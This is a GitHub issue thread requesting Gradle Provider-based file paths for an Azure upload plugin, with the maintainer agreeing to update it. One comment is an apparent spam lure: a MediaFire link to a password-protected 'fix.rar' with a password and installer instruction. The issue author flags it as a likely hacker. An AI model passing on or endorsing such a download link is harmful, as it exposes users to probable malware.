### ISSUE TITLE
Support Providers for file locations

### ISSUE THREAD

**Issue by mandrachek** [kmbisset89/azure-upload-gradle-plugin#1]
## ⚠️ Is your feature request related to a problem? Please describe

Requires hardcoding paths or using deprecated apis resulting deprecation warnings.

## 💡 Describe the solution you'd like

The plugin currently requires a string path. To get to files in the build folder, this requires doing something like "${project.buildDir}/mydirectory/somefileToUpload.zip" - accessing `project.buildDir` in this manner is deprecated.  Using providers, this would look like:
withPath layout.buildDirectory.file("mydirectory/somefileToUpload.zip")

## 🤚 Do you want to develop this feature yourself?

- [ ] Yes
- [X] No

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mandrachek** [comment]
@NeonRST sounds like you're a bot/hacker.  If you think I'm downloading that file you're crazy banannas, and I hope nobody does.

**Comment by kmbisset89** [comment]
@mandrachek yup that sure has changed recently-ish. I will update to the new structure and release a build.
